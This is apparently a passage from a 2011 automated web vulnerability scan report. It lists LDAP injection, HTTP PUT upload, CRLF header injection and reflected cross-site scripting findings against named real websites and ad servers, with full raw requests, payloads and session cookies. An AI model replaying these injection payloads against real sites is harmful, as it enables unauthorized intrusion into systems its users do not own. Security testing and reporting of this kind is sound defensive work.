                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a
...[SNIP]...

Request 2

GET /*)!(sn=*/jobs4/javascript/jobs_search_box.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: edf9973f-dbc0-444a-90a1-fdb5e628ed9c
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=120
Date: Sun, 01 May 2011 23:33:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/business/economy/obama-slams-oil-company-profits-as-gas-prices-surge/2011/04/29/AFPhwyGF_story.html">Obama slams oil company profits as gas prices surge</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the-relentless-smear-campaign-against-obama/2011/04/29/AFkSVyGF_story.html">The relentless smear campaign against Obama</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/birthers-buffoonery-and-a-sad-discourse/2011/04/29/AFdnwyGF_story.html">Birthers, buffoonery and a sad discourse</a>
               </li>
           <li>
                   <a href="http://live.washingtonpost.com/white-house-correspondents-dinner-2011-recap.html">2011 White House Correspondents Dinner: A recap - 2011 White House Correspondents</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the_obama_doctrine_leading_from_behind/201
...[SNIP]...
4.3. http://www.washingtonpost.com/wp-srv/ssi/globalnav/js/channelnavLogo.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /wp-srv/ssi/globalnav/js/channelnavLogo.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/ssi/globalnav/js/channelnavLogo.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: edf9973f-dbc0-444a-90a1-fdb5e628ed9c
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=120
Date: Sun, 01 May 2011 23:33:21 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/business/economy/obama-slams-oil-company-profits-as-gas-prices-surge/2011/04/29/AFPhwyGF_story.html">Obama slams oil company profits as gas prices surge</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the-relentless-smear-campaign-against-obama/2011/04/29/AFkSVyGF_story.html">The relentless smear campaign against Obama</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/birthers-buffoonery-and-a-sad-discourse/2011/04/29/AFdnwyGF_story.html">Birthers, buffoonery and a sad discourse</a>
               </li>
           <li>
                   <a href="http://live.washingtonpost.com/white-house-correspondents-dinner-2011-recap.html">2011 White House Correspondents Dinner: A recap - 2011 White House Correspondents</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/the_obama_doctrine_leading_from_behind/201
...[SNIP]...

Request 2

GET /*)!(sn=*/ssi/globalnav/js/channelnavLogo.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: f9bc6c41-6fd2-481e-b2a1-0a475f93cc95
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=119
Date: Sun, 01 May 2011 23:33:21 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/business/economy/running-in-the-red-how-the-us-on-the-road-to-surplus-detoured-to-massive-debt/2011/04/28/AFFU7rNF_story.html">Running in the red: How the U.S., on the road to surplus, detoured to massive debt</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/sports/redskins/nfl-draft-2011-redskins-add-nine-more-draft-picks-for-a-total-of-12/2011/04/30/AFTZo7NF_story.html">NFL draft 2011: Redskins add nine more draft picks for a total of 12</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/local/tornado-tally-at-19-for-maryland-and-virginia/2011/04/30/AFySjwOF_story.html">Tornado tally at 19 for Maryland and Virginia</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/world/libya-frontline-turns-quiet-as-rebels-regroup/2011/04/29/AFEwjwNF_story.html">Libya front line turns quiet as rebels regroup</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a
...[SNIP]...
5. HTTP PUT enabled  previous  next
There are 2 instances of this issue:

5.1. http://www.onlinemicrofiche.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onlinemicrofiche.com
Path:   /favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /1a950014e4506089.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /1a950014e4506089.txt HTTP/1.0
Host: www.onlinemicrofiche.com
Content-Length: 16

e5dcc84f7b5a59c8

Response 1

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 00:38:02 GMT
Location: http://www.onlinemicrofiche.com/1a950014e4506089.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /1a950014e4506089.txt HTTP/1.0
Host: www.onlinemicrofiche.com

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 00:38:02 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 02 May 2011 00:38:02 GMT
ETag: W/"da9f931618cc1:dc0"
Content-Length: 16

e5dcc84f7b5a59c8
5.2. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/checkout/Viewcart.asp

Issue detail

HTTP PUT is enabled on the web server. The file /29ed5e51742981e7.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /29ed5e51742981e7.txt HTTP/1.0
Host: www.onlinemicrofiche.com
Content-Length: 16

8562c216a2d852a8

Response 1

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:19:43 GMT
Location: https://www.onlinemicrofiche.com/29ed5e51742981e7.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /29ed5e51742981e7.txt HTTP/1.0
Host: www.onlinemicrofiche.com

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:19:43 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 02 May 2011 03:19:43 GMT
ETag: W/"b8cdb9c7778cc1:dd2"
Content-Length: 16

8562c216a2d852a8
6. HTTP header injection  previous  next
There are 6 instances of this issue:

6.1. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.16 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.16

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 527ab%0d%0a3565611b9b4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /527ab%0d%0a3565611b9b4/N3382.Yahoo/B5116950.16;sz=150x30;pc=[TPAS_ID];click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWFsbTd1cChnaWQkQlpWSEZXS0lSbGlLUm1lWlRhdFBrUUMycmNIVzgwMjk3YThBQWlCdCxzdCQxMzA0MjkyNzgzMjE4Njc4LHNpJDQ0NjQwNTEsdiQxLjAsYWlkJGlGdWVGVXdON3k0LSxjdCQyNSx5YngkTE9UVjlha25jZmtCTDgzNVFtUmduUSxyJDAscmQkMTZpZmY1MGZtKSk/1/*http://global.ard.yahoo.com/SIG=15g2ds2nv/M=999999.999999.999999.999999/D=news/S=96654906:FB/Y=YAHOO/EXP=1304299983/L=BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt/B=iFueFUwN7y4-/J=1304292783275135/K=mbmuBMnyuFXFamzNMr12dQ/A=2394450929415713467/R=0/X=6/*;dcopt=rcl;mtfIFPath=nofile;ord=1304292783.275135? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/527ab
3565611b9b4/N3382.Yahoo/B5116950.16;sz=150x30;pc=[TPAS_ID];click=http: //clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bWFsbTd1cChnaWQkQlpWSEZXS0lSbGlLUm1lWlRhdFBrUUMycmNIVzgwMjk3YThBQWlCdCxzdCQxMzA0MjkyNzgzMjE4Njc4LHNpJDQ0NjQwNTEsdiQxLjAsYWlkJGlGdWVGVXdON3k0LSxjdCQyNSx5YngkTE9UVjlha2
Date: Sun, 01 May 2011 23:34:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
6.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 83f32%0d%0a81dda35bbd7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /83f32%0d%0a81dda35bbd7/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/83f32
81dda35bbd7/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http: //googleads.g.doubleclick.net/aclk
Date: Mon, 02 May 2011 02:29:48 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
6.3. http://ad.doubleclick.net/adj/wpni.jobs/front [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.jobs/front

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 889bb%0d%0ac948c2d7ba2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /889bb%0d%0ac948c2d7ba2/wpni.jobs/front;sz=728x90;pos=ad1;poe=yes;ad=lb;del=js;ajax=n;dcopt=ist;ad=interstitial;heavy=y;pageId=wpni-wl-jobs-home;fromrss=n;rss=n;front=n;tile=1;ord=29166153864935040? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/889bb
c948c2d7ba2/wpni.jobs/front;sz=728x90;pos=ad1;poe=yes;ad=lb;del=js;ajax=n;dcopt=ist;ad=interstitial;heavy=y;pageId=wpni-wl-jobs-home;fromrss=n;rss=n;front=n;tile=1;ord=29166153864935040:
Date: Sun, 01 May 2011 23:36:00 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
6.4. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /n/61239/71938/EI6/x/e

Issue detail

The value of REST URL parameter 2 is copied into the location response header. The payload 81751%0d%0a4daf40cbe6 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /n/81751%0d%0a4daf40cbe6/71938/EI6/x/e?value=0&trans=&domain=na.decdna.net HTTP/1.1
Host: na.decdna.net
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:39:12 GMT
Server: Apache/2.2.3 (Red Hat)
Pragma: no-cache
Expires: Sun, 01 May 2011 23:39:12 GMT
location: http://dna1.mookie1.com/n/81751
4daf40cbe6/71938/EI6/x/e?value=0&trans=&domain=na.decdna.net?0&value=0&trans=&domain=na.decdna.net&redirected
Content-Length: 0
Content-Type: text/plain

6.5. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /n/61239/71938/EI6/x/e

Issue detail

The value of REST URL parameter 4 is copied into the location response header. The payload a58b5%0d%0aa827e2ca2c6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /n/61239/71938/a58b5%0d%0aa827e2ca2c6/x/e?value=0&trans=&domain=na.decdna.net HTTP/1.1
Host: na.decdna.net
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:40:30 GMT
Server: Apache/2.2.3 (Red Hat)
Pragma: no-cache
Expires: Sun, 01 May 2011 23:40:30 GMT
location: http://dna1.mookie1.com/n/61239/71938/a58b5
a827e2ca2c6/x/e?0&value=0&trans=&domain=na.decdna.net&redirected
Content-Length: 0
Content-Type: text/plain

6.6. http://na.decdna.net/n/61239/71938/EI6/x/e [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /n/61239/71938/EI6/x/e

Issue detail

The value of REST URL parameter 5 is copied into the location response header. The payload 80700%0d%0af0193fdb2e3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /n/61239/71938/EI6/80700%0d%0af0193fdb2e3/e?value=0&trans=&domain=na.decdna.net HTTP/1.1
Host: na.decdna.net
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:41:09 GMT
Server: Apache/2.2.3 (Red Hat)
Pragma: no-cache
Expires: Sun, 01 May 2011 23:41:09 GMT
location: http://dna1.mookie1.com/n/61239/71938/EI6/80700
f0193fdb2e3/e?0&value=0&trans=&domain=na.decdna.net&redirected
Content-Length: 0
Content-Type: text/plain

7. Cross-site scripting (reflected)  previous  next
There are 151 instances of this issue:

7.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9596"-alert(1)-"aec72338c29 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=f9596"-alert(1)-"aec72338c29 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7829
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 02:28:57 GMT
Expires: Mon, 02 May 2011 02:28:57 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
